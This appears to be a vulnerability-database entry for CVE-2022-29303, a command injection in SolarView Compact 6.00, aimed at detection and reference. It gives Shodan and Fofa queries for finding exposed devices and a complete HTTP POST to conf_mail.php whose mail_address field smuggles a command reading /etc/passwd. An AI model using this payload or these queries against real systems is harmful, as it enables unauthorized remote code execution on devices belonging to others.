🔙 목록으로 돌아가기

CVE-2022-29303: SolarView Compact 6.00 - OS Command Injection

TitleSolarView Compact 6.00 - OS Command Injection
Authorbadboycxcc
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system.
RemediationApply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00.
CVSS Score9.8
EPSS Score0.94372
CVE IDCVE-2022-29303
CWE IDCWE-78
Shodan Queryhttp.html:"SolarView Compact"http.html:"solarview compact"
Fofa Querybody="solarview compact"
Tags cve cve2022 injection solarview edb packetstorm rce kev contec vkev vuln

🔍 Vulnerability Description

SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php.

🌐 HTTP Request

POST /conf_mail.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.20
Connection: close
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-29303.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-29303.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A